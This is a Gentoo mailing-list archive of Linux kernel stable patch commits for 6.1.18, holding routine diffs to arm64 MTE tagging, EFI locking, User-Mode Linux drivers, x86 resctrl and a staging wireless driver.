++	TPM2_PT_CONTEXT_HASH = TPM2_PT_FIXED + 26,
++	TPM2_PT_CONTEXT_SYM = TPM2_PT_FIXED + 27,
++	TPM2_PT_CONTEXT_SYM_SIZE = TPM2_PT_FIXED + 28,
++	TPM2_PT_ORDERLY_COUNT = TPM2_PT_FIXED + 29,
++	TPM2_PT_MAX_COMMAND_SIZE = TPM2_PT_FIXED + 30,
++	TPM2_PT_MAX_RESPONSE_SIZE = TPM2_PT_FIXED + 31,
++	TPM2_PT_MAX_DIGEST = TPM2_PT_FIXED + 32,
++	TPM2_PT_MAX_OBJECT_CONTEXT = TPM2_PT_FIXED + 33,
++	TPM2_PT_MAX_SESSION_CONTEXT = TPM2_PT_FIXED + 34,
++	TPM2_PT_PS_FAMILY_INDICATOR = TPM2_PT_FIXED + 35,
++	TPM2_PT_PS_LEVEL = TPM2_PT_FIXED + 36,
++	TPM2_PT_PS_REVISION = TPM2_PT_FIXED + 37,
++	TPM2_PT_PS_DAY_OF_YEAR = TPM2_PT_FIXED + 38,
++	TPM2_PT_PS_YEAR = TPM2_PT_FIXED + 39,
++	TPM2_PT_SPLIT_MAX = TPM2_PT_FIXED + 40,
++	TPM2_PT_TOTAL_COMMANDS = TPM2_PT_FIXED + 41,
++	TPM2_PT_LIBRARY_COMMANDS = TPM2_PT_FIXED + 42,
++	TPM2_PT_VENDOR_COMMANDS = TPM2_PT_FIXED + 43,
++	TPM2_PT_NV_BUFFER_MAX = TPM2_PT_FIXED + 44,
++	TPM2_PT_MODES = TPM2_PT_FIXED + 45,
++	TPM2_PT_MAX_CAP_BUFFER = TPM2_PT_FIXED + 46,
++	TPM2_PT_VAR = TPM2_PT_GROUP * 2,
++	TPM2_PT_PERMANENT = TPM2_PT_VAR + 0,
++	TPM2_PT_STARTUP_CLEAR = TPM2_PT_VAR + 1,
++	TPM2_PT_HR_NV_INDEX = TPM2_PT_VAR + 2,
++	TPM2_PT_HR_LOADED = TPM2_PT_VAR + 3,
++	TPM2_PT_HR_LOADED_AVAIL = TPM2_PT_VAR + 4,
++	TPM2_PT_HR_ACTIVE = TPM2_PT_VAR + 5,
++	TPM2_PT_HR_ACTIVE_AVAIL = TPM2_PT_VAR + 6,
++	TPM2_PT_HR_TRANSIENT_AVAIL = TPM2_PT_VAR + 7,
++	TPM2_PT_HR_PERSISTENT = TPM2_PT_VAR + 8,
++	TPM2_PT_HR_PERSISTENT_AVAIL = TPM2_PT_VAR + 9,
++	TPM2_PT_NV_COUNTERS = TPM2_PT_VAR + 10,
++	TPM2_PT_NV_COUNTERS_AVAIL = TPM2_PT_VAR + 11,
++	TPM2_PT_ALGORITHM_SET = TPM2_PT_VAR + 12,
++	TPM2_PT_LOADED_CURVES = TPM2_PT_VAR + 13,
++	TPM2_PT_LOCKOUT_COUNTER = TPM2_PT_VAR + 14,
++	TPM2_PT_MAX_AUTH_FAIL = TPM2_PT_VAR + 15,
++	TPM2_PT_LOCKOUT_INTERVAL = TPM2_PT_VAR + 16,
++	TPM2_PT_LOCKOUT_RECOVERY = TPM2_PT_VAR + 17,
++	TPM2_PT_NV_WRITE_RECOVERY = TPM2_PT_VAR + 18,
++	TPM2_PT_AUDIT_COUNTER_0 = TPM2_PT_VAR + 19,
++	TPM2_PT_AUDIT_COUNTER_1 = TPM2_PT_VAR + 20,
++};
+ 
+ /* 128 bytes is an arbitrary cap. This could be as large as TPM_BUFSIZE - 18
+  * bytes, but 128 is still a relatively large number of random bytes and
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+index 702551056227d..f660f947ab631 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+@@ -185,7 +185,6 @@ static void _rtl92e_dm_init_fsync(struct net_device *dev);
+ static void _rtl92e_dm_deinit_fsync(struct net_device *dev);
+ 
+ static	void _rtl92e_dm_check_txrateandretrycount(struct net_device *dev);
+-static  void _rtl92e_dm_check_ac_dc_power(struct net_device *dev);
+ static void _rtl92e_dm_check_fsync(struct net_device *dev);
+ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data);
+ static void _rtl92e_dm_fsync_timer_callback(struct timer_list *t);
+@@ -238,8 +237,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	if (priv->being_init_adapter)
+ 		return;
+ 
+-	_rtl92e_dm_check_ac_dc_power(dev);
+-
+ 	_rtl92e_dm_check_txrateandretrycount(dev);
+ 	_rtl92e_dm_check_edca_turbo(dev);
+ 
+@@ -257,28 +254,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	_rtl92e_dm_cts_to_self(dev);
+ }
+ 
+-static void _rtl92e_dm_check_ac_dc_power(struct net_device *dev)
+-{
+-	struct r8192_priv *priv = rtllib_priv(dev);
+-	static const char ac_dc_script[] = "/etc/acpi/wireless-rtl-ac-dc-power.sh";
+-	char *argv[] = {(char *)ac_dc_script, DRV_NAME, NULL};
+-	static char *envp[] = {"HOME=/",
+-			"TERM=linux",
+-			"PATH=/usr/bin:/bin",
+-			 NULL};
+-
+-	if (priv->ResetProgress == RESET_TYPE_SILENT) {
+-		return;
+-	}
+-
+-	if (priv->rtllib->state != RTLLIB_LINKED)
+-		return;
+-	call_usermodehelper(ac_dc_script, argv, envp, UMH_WAIT_PROC);
+-
+-	return;
+-};
+-
+-
+ void rtl92e_init_adaptive_rate(struct net_device *dev)
+ {
+ 
+@@ -1667,10 +1642,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 	u8 tmp1byte;
+ 	enum rt_rf_power_state rf_power_state_to_set;
+ 	bool bActuallySet = false;
+-	char *argv[3];
+-	static const char RadioPowerPath[] = "/etc/acpi/events/RadioPower.sh";
+-	static char *envp[] = {"HOME=/", "TERM=linux", "PATH=/usr/bin:/bin",
+-			       NULL};
+ 
+ 	bActuallySet = false;
+ 
+@@ -1700,14 +1671,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 		mdelay(1000);
+ 		priv->bHwRfOffAction = 1;
+ 		rtl92e_set_rf_state(dev, rf_power_state_to_set, RF_CHANGE_BY_HW);
+-		if (priv->hw_radio_off)
+-			argv[1] = "RFOFF";
+-		else
+-			argv[1] = "RFON";
+-
+-		argv[0] = (char *)RadioPowerPath;
+-		argv[2] = NULL;
+-		call_usermodehelper(RadioPowerPath, argv, envp, UMH_WAIT_PROC);
+ 	}
+ }
+ 
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 89fc5683ed26c..6e87d2cd83456 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -1486,8 +1486,6 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 		connect->key = NULL;
+ 		connect->key_len = 0;
+ 		connect->key_idx = 0;
+-		connect->crypto.cipher_group = 0;
+-		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-11 14:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-11 14:09 UTC (permalink / raw
  To: gentoo-commits

commit:     0fdb24c0cf993d08834d5d2b4d00d0e195ad5567
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 14:09:04 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 14:09:04 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0fdb24c0

Linux patch 6.1.18

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1017_linux-6.1.18.patch | 9430 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9434 insertions(+)

diff --git a/0000_README b/0000_README
index e2811191..e3d2c14c 100644
--- a/0000_README
+++ b/0000_README
@@ -111,6 +111,10 @@ Patch:  1016_linux-6.1.17.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.17
 
+Patch:  1017_linux-6.1.18.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.18
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1017_linux-6.1.18.patch b/1017_linux-6.1.18.patch
new file mode 100644
index 00000000..ed54f1f1
--- /dev/null
+++ b/1017_linux-6.1.18.patch
@@ -0,0 +1,9430 @@
+diff --git a/Documentation/ABI/testing/configfs-usb-gadget-uvc b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+index 611b23e6488d9..feb3f2cc0c167 100644
+--- a/Documentation/ABI/testing/configfs-usb-gadget-uvc
++++ b/Documentation/ABI/testing/configfs-usb-gadget-uvc
+@@ -52,7 +52,7 @@ Date:		Dec 2014
+ KernelVersion:	4.0
+ Description:	Default output terminal descriptors
+ 
+-		All attributes read only:
++		All attributes read only except bSourceID:
+ 
+ 		==============	=============================================
+ 		iTerminal	index of string descriptor
+diff --git a/Makefile b/Makefile
+index db482a420dcaf..a825361f71625 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 17
++SUBLEVEL = 18
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/spear320-hmi.dts b/arch/arm/boot/dts/spear320-hmi.dts
+index 34503ac9c51c2..721e5ee7b6803 100644
+--- a/arch/arm/boot/dts/spear320-hmi.dts
++++ b/arch/arm/boot/dts/spear320-hmi.dts
+@@ -241,7 +241,7 @@
+ 					irq-trigger = <0x1>;
+ 
+ 					stmpegpio: stmpe-gpio {
+-						compatible = "stmpe,gpio";
++						compatible = "st,stmpe-gpio";
+ 						reg = <0>;
+ 						gpio-controller;
+ 						#gpio-cells = <2>;
+diff --git a/arch/arm64/include/asm/efi.h b/arch/arm64/include/asm/efi.h
+index b13c22046de58..62c846be2d76a 100644
+--- a/arch/arm64/include/asm/efi.h
++++ b/arch/arm64/include/asm/efi.h
+@@ -33,7 +33,7 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ ({									\
+ 	efi_virtmap_load();						\
+ 	__efi_fpsimd_begin();						\
+-	spin_lock(&efi_rt_lock);					\
++	raw_spin_lock(&efi_rt_lock);					\
+ })
+ 
+ #undef arch_efi_call_virt
+@@ -42,12 +42,12 @@ int efi_set_mapping_permissions(struct mm_struct *mm, efi_memory_desc_t *md);
+ 
+ #define arch_efi_call_virt_teardown()					\
+ ({									\
+-	spin_unlock(&efi_rt_lock);					\
++	raw_spin_unlock(&efi_rt_lock);					\
+ 	__efi_fpsimd_end();						\
+ 	efi_virtmap_unload();						\
+ })
+ 
+-extern spinlock_t efi_rt_lock;
++extern raw_spinlock_t efi_rt_lock;
+ extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+diff --git a/arch/arm64/include/asm/mte.h b/arch/arm64/include/asm/mte.h
+index 760c62f8e22f8..3f8199ba265a1 100644
+--- a/arch/arm64/include/asm/mte.h
++++ b/arch/arm64/include/asm/mte.h
+@@ -37,6 +37,29 @@ void mte_free_tag_storage(char *storage);
+ /* track which pages have valid allocation tags */
+ #define PG_mte_tagged	PG_arch_2
+ 
++static inline void set_page_mte_tagged(struct page *page)
++{
++	/*
++	 * Ensure that the tags written prior to this function are visible
++	 * before the page flags update.
++	 */
++	smp_wmb();
++	set_bit(PG_mte_tagged, &page->flags);
++}
++
++static inline bool page_mte_tagged(struct page *page)
++{
++	bool ret = test_bit(PG_mte_tagged, &page->flags);
++
++	/*
++	 * If the page is tagged, ensure ordering with a likely subsequent
++	 * read of the tags.
++	 */
++	if (ret)
++		smp_rmb();
++	return ret;
++}
++
+ void mte_zero_clear_page_tags(void *addr);
+ void mte_sync_tags(pte_t old_pte, pte_t pte);
+ void mte_copy_page_tags(void *kto, const void *kfrom);
+@@ -56,6 +79,13 @@ size_t mte_probe_user_range(const char __user *uaddr, size_t size);
+ /* unused if !CONFIG_ARM64_MTE, silence the compiler */
+ #define PG_mte_tagged	0
+ 
++static inline void set_page_mte_tagged(struct page *page)
++{
++}
++static inline bool page_mte_tagged(struct page *page)
++{
++	return false;
++}
+ static inline void mte_zero_clear_page_tags(void *addr)
+ {
+ }
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index f1cfc44ef52fe..5d0f1f7b76004 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -1050,7 +1050,7 @@ static inline void arch_swap_invalidate_area(int type)
+ static inline void arch_swap_restore(swp_entry_t entry, struct folio *folio)
+ {
+ 	if (system_supports_mte() && mte_restore_tags(entry, &folio->page))
+-		set_bit(PG_mte_tagged, &folio->flags);
++		set_page_mte_tagged(&folio->page);
+ }
+ 
+ #endif /* CONFIG_ARM64_MTE */
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index 86b2f7ec6c67e..b3eb53847c96b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2074,8 +2074,10 @@ static void cpu_enable_mte(struct arm64_cpu_capabilities const *cap)
+ 	 * Clear the tags in the zero page. This needs to be done via the
+ 	 * linear map which has the Tagged attribute.
+ 	 */
+-	if (!test_and_set_bit(PG_mte_tagged, &ZERO_PAGE(0)->flags))
++	if (!page_mte_tagged(ZERO_PAGE(0))) {
+ 		mte_clear_page_tags(lm_alias(empty_zero_page));
++		set_page_mte_tagged(ZERO_PAGE(0));
++	}
+ 
+ 	kasan_init_hw_tags_cpu();
+ }
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index b273900f45668..a30dbe4b95cd3 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -146,7 +146,7 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	return s;
+ }
+ 
+-DEFINE_SPINLOCK(efi_rt_lock);
++DEFINE_RAW_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
+diff --git a/arch/arm64/kernel/elfcore.c b/arch/arm64/kernel/elfcore.c
+index 662a61e5e75e4..2e94d20c4ac7a 100644
+--- a/arch/arm64/kernel/elfcore.c
++++ b/arch/arm64/kernel/elfcore.c
+@@ -46,7 +46,7 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 		 * Pages mapped in user space as !pte_access_permitted() (e.g.
+ 		 * PROT_EXEC only) may not have the PG_mte_tagged flag set.
+ 		 */
+-		if (!test_bit(PG_mte_tagged, &page->flags)) {
++		if (!page_mte_tagged(page)) {
+ 			put_page(page);
+ 			dump_skip(cprm, MTE_PAGE_TAG_STORAGE);
+ 			continue;
+diff --git a/arch/arm64/kernel/hibernate.c b/arch/arm64/kernel/hibernate.c
+index af5df48ba915b..788597a6b6a2f 100644
+--- a/arch/arm64/kernel/hibernate.c
++++ b/arch/arm64/kernel/hibernate.c
+@@ -271,7 +271,7 @@ static int swsusp_mte_save_tags(void)
+ 			if (!page)
+ 				continue;
+ 
+-			if (!test_bit(PG_mte_tagged, &page->flags))
++			if (!page_mte_tagged(page))
+ 				continue;
+ 
+ 			ret = save_tags(page, pfn);
+diff --git a/arch/arm64/kernel/mte.c b/arch/arm64/kernel/mte.c
+index 7467217c1eaf3..84a085d536f84 100644
+--- a/arch/arm64/kernel/mte.c
++++ b/arch/arm64/kernel/mte.c
+@@ -41,8 +41,10 @@ static void mte_sync_page_tags(struct page *page, pte_t old_pte,
+ 	if (check_swap && is_swap_pte(old_pte)) {
+ 		swp_entry_t entry = pte_to_swp_entry(old_pte);
+ 
+-		if (!non_swap_entry(entry) && mte_restore_tags(entry, page))
++		if (!non_swap_entry(entry) && mte_restore_tags(entry, page)) {
++			set_page_mte_tagged(page);
+ 			return;
++		}
+ 	}
+ 
+ 	if (!pte_is_tagged)
+@@ -52,8 +54,10 @@ static void mte_sync_page_tags(struct page *page, pte_t old_pte,
+ 	 * Test PG_mte_tagged again in case it was racing with another
+ 	 * set_pte_at().
+ 	 */
+-	if (!test_and_set_bit(PG_mte_tagged, &page->flags))
++	if (!page_mte_tagged(page)) {
+ 		mte_clear_page_tags(page_address(page));
++		set_page_mte_tagged(page);
++	}
+ }
+ 
+ void mte_sync_tags(pte_t old_pte, pte_t pte)
+@@ -69,9 +73,11 @@ void mte_sync_tags(pte_t old_pte, pte_t pte)
+ 
+ 	/* if PG_mte_tagged is set, tags have already been initialised */
+ 	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!test_bit(PG_mte_tagged, &page->flags))
++		if (!page_mte_tagged(page)) {
+ 			mte_sync_page_tags(page, old_pte, check_swap,
+ 					   pte_is_tagged);
++			set_page_mte_tagged(page);
++		}
+ 	}
+ 
+ 	/* ensure the tags are visible before the PTE is set */
+@@ -96,8 +102,7 @@ int memcmp_pages(struct page *page1, struct page *page2)
+ 	 * pages is tagged, set_pte_at() may zero or change the tags of the
+ 	 * other page via mte_sync_tags().
+ 	 */
+-	if (test_bit(PG_mte_tagged, &page1->flags) ||
+-	    test_bit(PG_mte_tagged, &page2->flags))
++	if (page_mte_tagged(page1) || page_mte_tagged(page2))
+ 		return addr1 != addr2;
+ 
+ 	return ret;
+@@ -454,7 +459,7 @@ static int __access_remote_tags(struct mm_struct *mm, unsigned long addr,
+ 			put_page(page);
+ 			break;
+ 		}
+-		WARN_ON_ONCE(!test_bit(PG_mte_tagged, &page->flags));
++		WARN_ON_ONCE(!page_mte_tagged(page));
+ 
+ 		/* limit access to the end of the page */
+ 		offset = offset_in_page(addr);
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index 2ff13a3f84796..817fdd1ab7783 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -1059,7 +1059,7 @@ long kvm_vm_ioctl_mte_copy_tags(struct kvm *kvm,
+ 		maddr = page_address(page);
+ 
+ 		if (!write) {
+-			if (test_bit(PG_mte_tagged, &page->flags))
++			if (page_mte_tagged(page))
+ 				num_tags = mte_copy_tags_to_user(tags, maddr,
+ 							MTE_GRANULES_PER_PAGE);
+ 			else
+@@ -1076,7 +1076,7 @@ long kvm_vm_ioctl_mte_copy_tags(struct kvm *kvm,
+ 			 * completed fully
+ 			 */
+ 			if (num_tags == MTE_GRANULES_PER_PAGE)
+-				set_bit(PG_mte_tagged, &page->flags);
++				set_page_mte_tagged(page);
+ 
+ 			kvm_release_pfn_dirty(pfn);
+ 		}
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 60ee3d9f01f8c..2c3759f1f2c56 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -1110,9 +1110,9 @@ static int sanitise_mte_tags(struct kvm *kvm, kvm_pfn_t pfn,
+ 		return -EFAULT;
+ 
+ 	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!test_bit(PG_mte_tagged, &page->flags)) {
++		if (!page_mte_tagged(page)) {
+ 			mte_clear_page_tags(page_address(page));
+-			set_bit(PG_mte_tagged, &page->flags);
++			set_page_mte_tagged(page);
+ 		}
+ 	}
+ 
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 24913271e898c..6dbc822332f2a 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -21,9 +21,11 @@ void copy_highpage(struct page *to, struct page *from)
+ 
+ 	copy_page(kto, kfrom);
+ 
+-	if (system_supports_mte() && test_bit(PG_mte_tagged, &from->flags)) {
+-		set_bit(PG_mte_tagged, &to->flags);
++	if (system_supports_mte() && page_mte_tagged(from)) {
++		if (kasan_hw_tags_enabled())
++			page_kasan_tag_reset(to);
+ 		mte_copy_page_tags(kto, kfrom);
++		set_page_mte_tagged(to);
+ 	}
+ }
+ EXPORT_SYMBOL(copy_highpage);
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 3eb2825d08cff..4ee20280133e4 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -944,5 +944,5 @@ struct page *alloc_zeroed_user_highpage_movable(struct vm_area_struct *vma,
+ void tag_clear_highpage(struct page *page)
+ {
+ 	mte_zero_clear_page_tags(page_address(page));
+-	set_bit(PG_mte_tagged, &page->flags);
++	set_page_mte_tagged(page);
+ }
+diff --git a/arch/arm64/mm/mteswap.c b/arch/arm64/mm/mteswap.c
+index bed803d8e1585..70f913205db99 100644
+--- a/arch/arm64/mm/mteswap.c
++++ b/arch/arm64/mm/mteswap.c
+@@ -24,7 +24,7 @@ int mte_save_tags(struct page *page)
+ {
+ 	void *tag_storage, *ret;
+ 
+-	if (!test_bit(PG_mte_tagged, &page->flags))
++	if (!page_mte_tagged(page))
+ 		return 0;
+ 
+ 	tag_storage = mte_allocate_tag_storage();
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index ded7c47d2fbe5..131b7cb295767 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -767,6 +767,7 @@ static int vector_config(char *str, char **error_out)
+ 
+ 	if (parsed == NULL) {
+ 		*error_out = "vector_config failed to parse parameters";
++		kfree(params);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index 3ac220dafec4a..5472b1a0a0398 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -132,8 +132,11 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 				out ? 1 : 0,
+ 				posted ? cmd : HANDLE_NO_FREE(cmd),
+ 				GFP_ATOMIC);
+-	if (ret)
++	if (ret) {
++		if (posted)
++			kfree(cmd);
+ 		goto out;
++	}
+ 
+ 	if (posted) {
+ 		virtqueue_kick(dev->cmd_vq);
+@@ -623,22 +626,33 @@ static void um_pci_virtio_remove(struct virtio_device *vdev)
+ 	struct um_pci_device *dev = vdev->priv;
+ 	int i;
+ 
+-        /* Stop all virtqueues */
+-        virtio_reset_device(vdev);
+-        vdev->config->del_vqs(vdev);
+-
+ 	device_set_wakeup_enable(&vdev->dev, false);
+ 
+ 	mutex_lock(&um_pci_mtx);
+ 	for (i = 0; i < MAX_DEVICES; i++) {
+ 		if (um_pci_devices[i].dev != dev)
+ 			continue;
++
+ 		um_pci_devices[i].dev = NULL;
+ 		irq_free_desc(dev->irq);
++
++		break;
+ 	}
+ 	mutex_unlock(&um_pci_mtx);
+ 
+-	um_pci_rescan();
++	if (i < MAX_DEVICES) {
++		struct pci_dev *pci_dev;
++
++		pci_dev = pci_get_slot(bridge->bus, i);
++		if (pci_dev)
++			pci_stop_and_remove_bus_device_locked(pci_dev);
++	}
++
++	/* Stop all virtqueues */
++	virtio_reset_device(vdev);
++	dev->cmd_vq = NULL;
++	dev->irq_vq = NULL;
++	vdev->config->del_vqs(vdev);
+ 
+ 	kfree(dev);
+ }
+diff --git a/arch/um/drivers/virtio_uml.c b/arch/um/drivers/virtio_uml.c
+index 588930a0ced17..ddd080f6dd82e 100644
+--- a/arch/um/drivers/virtio_uml.c
++++ b/arch/um/drivers/virtio_uml.c
+@@ -168,7 +168,8 @@ static void vhost_user_check_reset(struct virtio_uml_device *vu_dev,
+ 	if (!vu_dev->registered)
+ 		return;
+ 
+-	virtio_break_device(&vu_dev->vdev);
++	vu_dev->registered = 0;
++
+ 	schedule_work(&pdata->conn_broken_wk);
+ }
+ 
+@@ -1136,6 +1137,15 @@ void virtio_uml_set_no_vq_suspend(struct virtio_device *vdev,
+ 
+ static void vu_of_conn_broken(struct work_struct *wk)
+ {
++	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
++
++	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	/*
+ 	 * We can't remove the device from the devicetree so the only thing we
+ 	 * can do is warn.
+@@ -1266,8 +1276,14 @@ static int vu_unregister_cmdline_device(struct device *dev, void *data)
+ static void vu_conn_broken(struct work_struct *wk)
+ {
+ 	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
+ 
+ 	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	vu_unregister_cmdline_device(&pdata->pdev->dev, NULL);
+ }
+ 
+diff --git a/arch/x86/include/asm/resctrl.h b/arch/x86/include/asm/resctrl.h
+index d24b04ebf950e..a4641d68eaba1 100644
+--- a/arch/x86/include/asm/resctrl.h
++++ b/arch/x86/include/asm/resctrl.h
+@@ -51,7 +51,7 @@ DECLARE_STATIC_KEY_FALSE(rdt_mon_enable_key);
+  *   simple as possible.
+  * Must be called with preemption disabled.
+  */
+-static void __resctrl_sched_in(void)
++static inline void __resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	struct resctrl_pqr_state *state = this_cpu_ptr(&pqr_state);
+ 	u32 closid = state->default_closid;
+@@ -63,13 +63,13 @@ static void __resctrl_sched_in(void)
+ 	 * Else use the closid/rmid assigned to this cpu.
+ 	 */
+ 	if (static_branch_likely(&rdt_alloc_enable_key)) {
+-		tmp = READ_ONCE(current->closid);
++		tmp = READ_ONCE(tsk->closid);
+ 		if (tmp)
+ 			closid = tmp;
+ 	}
+ 
+ 	if (static_branch_likely(&rdt_mon_enable_key)) {
+-		tmp = READ_ONCE(current->rmid);
++		tmp = READ_ONCE(tsk->rmid);
+ 		if (tmp)
+ 			rmid = tmp;
+ 	}
+@@ -90,17 +90,17 @@ static inline unsigned int resctrl_arch_round_mon_val(unsigned int val)
+ 	return val * scale;
+ }
+ 
+-static inline void resctrl_sched_in(void)
++static inline void resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	if (static_branch_likely(&rdt_enable_key))
+-		__resctrl_sched_in();
++		__resctrl_sched_in(tsk);
+ }
+ 
+ void resctrl_cpu_detect(struct cpuinfo_x86 *c);
+ 
+ #else
+ 
+-static inline void resctrl_sched_in(void) {}
++static inline void resctrl_sched_in(struct task_struct *tsk) {}
+ static inline void resctrl_cpu_detect(struct cpuinfo_x86 *c) {}
+ 
+ #endif /* CONFIG_X86_CPU_RESCTRL */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 5993da21d8225..87b670d540b84 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -314,7 +314,7 @@ static void update_cpu_closid_rmid(void *info)
+ 	 * executing task might have its own closid selected. Just reuse
+ 	 * the context switch code.
+ 	 */
+-	resctrl_sched_in();
++	resctrl_sched_in(current);
+ }
+ 
+ /*
+@@ -535,7 +535,7 @@ static void _update_task_closid_rmid(void *task)
+ 	 * Otherwise, the MSR is updated when the task is scheduled in.
+ 	 */
+ 	if (task == current)
+-		resctrl_sched_in();
++		resctrl_sched_in(task);
+ }
+ 
+ static void update_task_closid_rmid(struct task_struct *t)
+diff --git a/arch/x86/kernel/process_32.c b/arch/x86/kernel/process_32.c
+index 2f314b170c9f0..ceab14b6118f7 100644
+--- a/arch/x86/kernel/process_32.c
++++ b/arch/x86/kernel/process_32.c
+@@ -212,7 +212,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	switch_fpu_finish();
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 6b3418bff3261..7f94dbbc397b7 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -656,7 +656,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	}
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/um/vdso/um_vdso.c b/arch/x86/um/vdso/um_vdso.c
+index 2112b8d146688..ff0f3b4b6c45e 100644
+--- a/arch/x86/um/vdso/um_vdso.c
++++ b/arch/x86/um/vdso/um_vdso.c
+@@ -17,8 +17,10 @@ int __vdso_clock_gettime(clockid_t clock, struct __kernel_old_timespec *ts)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_clock_gettime), "D" (clock), "S" (ts) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_clock_gettime), "D" (clock), "S" (ts)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+@@ -29,8 +31,10 @@ int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_gettimeofday), "D" (tv), "S" (tz) : "memory");
++	asm("syscall"
++		: "=a" (ret)
